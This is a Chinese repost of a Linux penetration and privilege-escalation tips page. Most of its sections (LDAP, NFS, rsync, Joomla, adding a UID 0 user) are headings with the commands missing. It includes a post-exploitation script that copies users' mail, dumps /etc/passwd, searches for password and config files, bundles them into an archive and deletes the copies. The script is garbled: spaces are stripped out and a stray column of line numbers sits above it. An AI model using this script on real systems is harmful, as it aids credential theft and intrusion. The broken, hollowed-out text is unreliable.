Linux渗透与提权:技巧总结篇
来源:互联网 发布:史密斯 24升 jsq48 js 编辑:程序博客网 时间:2024/06/03 14:14
转载自:http://www.91ri.org/7911.html
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。
Linux 系统下的一些常见路径:
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:
看看密码登录策略我们可以看到使用了file ldap模式
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
有密码形式
4.查找10条用户记录
实战:
看看密码登录策略我们可以看到使用了file ldap模式
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
有密码形式
4.查找10条用户记录
渗透实战:
1.返回所有的属性
3.查找
liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:
列举IP:
liunx 相关提权渗透技巧总结,三、rsync渗透技巧:
1.查看rsync服务器上的列表:
看相应的下级目录(注意一定要在目录后面添加上/)
2.下载rsync服务器上的配置文件
3.向上更新rsync文件(成功上传,不会覆盖)
liunx 相关提权渗透技巧总结,四、squid渗透技巧:
liunx 相关提权渗透技巧总结,五、SSH端口转发:
liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:
确定版本:
重新设置密码:
liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
liunx 相关提权渗透技巧总结,八、freebsd本地提权:
tar 文件夹打包:
1、tar打包:
{
注:
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
那么用这条比较好
}
系统信息收集:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
forlinux:
#!/bin/bash
echo#######geting sysinfo####
echo######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo#######basic infomation##
cat/proc/meminfo
echo
cat/proc/cpuinfo
echo
rpm-qa2>/dev/null
######stole the mail......######
cp-a/var/mail/tmp/getmail2>/dev/null
echo'u'ridis'`id`
echo###atq&crontab#####
atq
crontab-l
echo#####about var#####
set
echo#####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
cat/etc/hosts
hostname
ipconfig-a
arp-v
echo########user####
cat/etc/passwd|grep-ish
echo######service####
chkconfig--list
foriin{oracle,mysql,tomcat,samba,apache,ftp}
cat/etc/passwd|grep-i$i
done
locatepasswd>/tmp/password2>/dev/null
sleep5
locatepassword>>/tmp/password2>/dev/null
sleep5
locateconf>/tmp/sysconfig2>dev/null
sleep5
locateconfig>>/tmp/sysconfig2>/dev/null
sleep5
###maybe can use "tree /"###
echo##packing up#########
tarcvfgetsysinfo.tar/tmp/getmail/tmp/password/tmp/sysconfig
rm-rf/tmp/getmail/tmp/password/tmp/sysconfig
阅读全文
0 0
- Linux渗透与提权:技巧总结篇
- Linux渗透与提权:技巧总结篇
- Windows渗透与提权:技巧总结篇
- Windows渗透与提权技巧汇总
- 网站个人渗透技巧收集与总结
- 各种提权、渗透经验技巧总结大全(上)
- 各种提权、渗透经验技巧总结大全(上)
- 各种提权、渗透经验技巧总结大全(下)
- 渗透技巧总结
- Linux渗透技巧+实战
- linux渗透命令总结
- 各种渗透,提权的经验和技巧总结(下)
- 各种渗透,提权的经验和技巧总结(中)
- 各种渗透,提权的经验和技巧总结(上)
- linux渗透的小技巧
- mysql在渗透中的技巧总结
- 送给linux渗透爱好者的小技巧
- Linux 下 nfs mount渗透技巧
- JDK1.8新特性
- java--代理设计模式
- 18 使用全文本搜索
- 数组中子数组等于k的最大长度
- 身份证号码识别 Opencv3.3.0(C++)
- Linux渗透与提权:技巧总结篇
- SpringMVC中@ModelAttribute的使用
- 每天一点C#(二)
- HDU 6170 Two strings(DP)
- 【leetcode】3. Longest Substring Without Repeating Characters(Python & C++)
- 汽水瓶换汽水
- PHP实现系统编程(三) --- 信号
- 网络数据
- enumerate使用